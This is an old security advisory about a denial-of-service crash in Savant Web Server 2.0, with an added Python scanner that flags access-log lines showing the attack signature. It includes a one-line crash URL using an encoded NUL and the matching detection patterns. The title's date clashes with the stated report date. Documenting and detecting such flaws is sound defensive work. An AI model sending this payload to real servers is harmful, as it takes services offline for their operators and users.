Savant Web Server DoS - 04 Nov 1999

 
Savant Web Server 2.0 Denial of Service
Reported December 28, 1999 by
USSRLabs

VERSIONS AFFECTED
Savant Web Server 2.0

DESCRIPTION

Savant Web Server has a buffer overflow condition caused by appending a NULL character to the end of a URL. The problem causes the server to crash.

Example:
http://www.s0mep00rs4p.com/%00/

The action is logged and looks similar to the entry below:

Attacker Ip - - [28/Dec/1999:01:11:37 -0600] "GET /%00/index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html" 301 279
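
Added example (not part of the original advisory): a Python scan of Common Log Format lines for the signature in the entry above, an encoded NUL in the request path and the default document name repeated in the URL. The sample lines, client addresses, the repeat threshold of three and the double-decoding check (which goes beyond the single %00 case reported here) are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)$')
# Default document name appended to itself; threshold of 3 is an assumption.
REPEAT = re.compile(r'(index\.html){3,}', re.IGNORECASE)

def classify(line):
    """Return the reasons an access-log line is suspicious (empty list if none)."""
    m = CLF.match(line.strip())
    if not m:
        return ["unparsable"]
    parts = m.group(3).split(" ")
    # The advisory's entry has no protocol token, so accept "GET /path" too.
    target = parts[1] if len(parts) >= 2 else parts[0]
    raw = target.encode("latin-1", "replace")
    # Decode up to three times so forms such as %2500 are also caught.
    for _ in range(3):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    reasons = []
    if b"\x00" in raw:
        reasons.append("encoded-nul-in-path")
    if REPEAT.search(target):
        reasons.append("repeated-default-document")
    return reasons

def scan(lines):
    """Return (client, reasons) for every flagged line."""
    hits = []
    for line in lines:
        reasons = classify(line)
        if reasons:
            hits.append((line.split(" ", 1)[0], reasons))
    return hits

# Constructed sample log lines (documentation address range, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [28/Dec/1999:01:11:37 -0600] "GET /%00/index.htmlindex.htmlindex.html" 301 279',
    '192.0.2.11 - - [28/Dec/1999:01:12:02 -0600] "GET /index.html HTTP/1.0" 200 1024',
    '192.0.2.12 - - [28/Dec/1999:01:13:40 -0600] "GET /docs/%2500/ HTTP/1.0" 404 210',
]

if __name__ == "__main__":
    for client, reasons in scan(SAMPLE):
        print(client, ",".join(reasons))
```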


VENDOR RESPONSE

None known at the time of this writing.

CREDITS
Discovered by
USSRLabs
